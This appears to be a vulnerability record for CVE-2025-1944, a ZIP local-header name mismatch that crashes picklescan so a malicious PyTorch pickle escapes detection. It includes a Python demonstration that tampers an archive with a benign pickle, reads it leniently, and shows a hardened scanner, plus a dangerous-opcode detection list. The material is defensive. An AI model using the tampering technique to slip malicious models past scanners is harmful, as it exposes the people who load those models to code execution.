picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that makes it crash when it tries to extract and scan a PyTorch model archive. A PyTorch model archive is a ZIP file, and each member's name is stored twice: once in the member's local file header and once in the central directory. By rewriting the name in the local file header while leaving the original name in the central directory, an attacker makes Python's zipfile module raise BadZipFile when picklescan reads the member, so the scan aborts before any pickle is examined. PyTorch's own ZIP reader is more forgiving and still loads the model, so a malicious pickle payload in such an archive bypasses detection.
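The mechanism above, as an added example that is not picklescan's or PyTorch's own code: it builds a minimal archive with a benign pickle (constructed sample), rewrites only the local-header filename, and then reads the member two ways. The strict path uses Python's zipfile and fails with BadZipFile, as picklescan did; the lenient path is a stand-in for a loader that trusts only the central directory, assumed here for illustration, and it returns the payload regardless. scan_hardened is one defensive approach, not the fix in the referenced commit: a strict-parser rejection is reported as a finding, and the member is then read the lenient way so the bytes a loader would actually execute still get scanned.

```python
import io
import pickle
import pickletools
import struct
import zipfile

# Constructed sample: a benign pickle standing in for the model's data.pkl.
MEMBER_NAME = "archive/data.pkl"
PAYLOAD = pickle.dumps({"weights": [1, 2, 3]})

# Opcodes that let a pickle import and call arbitrary callables (illustrative set).
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE"}


def build_model_zip(member_name: str = MEMBER_NAME, payload: bytes = PAYLOAD) -> bytes:
    """Write a minimal PyTorch-style archive: one stored (uncompressed) member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


def tamper_local_header_name(archive: bytes, old: str, new: str) -> bytes:
    """Rewrite the filename inside the first local file header (PK\\x03\\x04) while
    leaving the central directory untouched. Keeping the length equal keeps every
    offset valid, so a directory-driven loader still finds the data."""
    old_b, new_b = old.encode(), new.encode()
    if len(old_b) != len(new_b):
        raise ValueError("replacement name must have the same length")
    off = archive.find(b"PK\x03\x04")
    name_len = struct.unpack_from("<H", archive, off + 26)[0]  # fixed local header is 30 bytes
    if archive[off + 30 : off + 30 + name_len] != old_b:
        raise ValueError("unexpected name in local header")
    return archive[: off + 30] + new_b + archive[off + 30 + name_len :]


def find_dangerous_opcodes(data: bytes) -> list:
    """Toy pickle scan: list the import/call opcodes present, without unpickling."""
    return sorted({op.name for op, _arg, _pos in pickletools.genops(data) if op.name in DANGEROUS_OPCODES})


def scan_with_zipfile(archive: bytes, name: str):
    """Strict path: zipfile compares the local-header name against the central
    directory name when a member is read and raises BadZipFile if they differ."""
    try:
        with zipfile.ZipFile(io.BytesIO(archive)) as zf:
            data = zf.read(name)
    except zipfile.BadZipFile as exc:
        return ("error", str(exc))
    return ("ok", find_dangerous_opcodes(data))


def read_member_via_central_directory(archive: bytes, name: str) -> bytes:
    """Lenient path (assumed model of a directory-driven loader): find the member by
    its central directory entry, jump to the recorded local header offset, skip the
    header's own name/extra fields without comparing them, and read the data."""
    eocd = archive.rfind(b"PK\x05\x06")                       # end of central directory
    pos = struct.unpack_from("<I", archive, eocd + 16)[0]     # central directory offset
    while archive[pos : pos + 4] == b"PK\x01\x02":
        csize = struct.unpack_from("<I", archive, pos + 20)[0]
        n_len, x_len, c_len = struct.unpack_from("<HHH", archive, pos + 28)
        local_off = struct.unpack_from("<I", archive, pos + 42)[0]
        entry_name = archive[pos + 46 : pos + 46 + n_len].decode()
        pos += 46 + n_len + x_len + c_len
        if entry_name != name:
            continue
        ln, lx = struct.unpack_from("<HH", archive, local_off + 26)
        start = local_off + 30 + ln + lx
        return archive[start : start + csize]                 # ZIP_STORED: no decompression
    raise KeyError(name)


def scan_hardened(archive: bytes, name: str) -> list:
    """Defensive variant (assumption, not picklescan's patch): report the parser
    rejection as a finding, then scan the bytes a lenient loader would execute."""
    status, detail = scan_with_zipfile(archive, name)
    if status == "ok":
        return detail
    findings = ["zip-inconsistency: " + detail]
    findings += find_dangerous_opcodes(read_member_via_central_directory(archive, name))
    return findings


if __name__ == "__main__":
    clean = build_model_zip()
    tampered = tamper_local_header_name(clean, MEMBER_NAME, "archive/data.bin")
    print("clean    :", scan_with_zipfile(clean, MEMBER_NAME))
    print("tampered :", scan_with_zipfile(tampered, MEMBER_NAME))
    print("lenient read intact:", read_member_via_central_directory(tampered, MEMBER_NAME) == PAYLOAD)
    print("hardened :", scan_hardened(tampered, MEMBER_NAME))
```

The point to take from the strict path is that the archive opens without complaint (the central directory is fine) and only the member read fails, so a scanner that wraps just the open call in error handling still crashes; a scanner that treats any parser disagreement as a finding, as scan_hardened does, fails closed instead of silently letting the model through.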
References
| Link | Resource |
|---|---|
| https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781 | Patch |
| https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82 | Exploit, Vendor Advisory |
| https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944 | Exploit, Third Party Advisory |
History
19 Mar 2025, 16:11
| Type | Values Removed | Values Added |
|---|---|---|
| References | | https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781 - Patch |
| References | | https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82 - Exploit, Vendor Advisory |
| References | | https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944 - Exploit, Third Party Advisory |
| First Time | | Mmaitre314 picklescan, Mmaitre314 |
| CVSS | v2 : v3 : | v2 : unknown v3 : 6.5 |
| CWE | | NVD-CWE-noinfo |
| CPE | | cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:* |
10 Mar 2025, 12:15
| Type | Values Removed | Values Added |
|---|---|---|
| New CVE | | |
Information
Published : 2025-03-10 12:15
Updated : 2025-03-19 16:11
NVD link : CVE-2025-1944
Mitre link : CVE-2025-1944
CVE.ORG link : CVE-2025-1944
Products Affected
mmaitre314
- picklescan
CWE
NVD-CWE-noinfo (insufficient information to classify)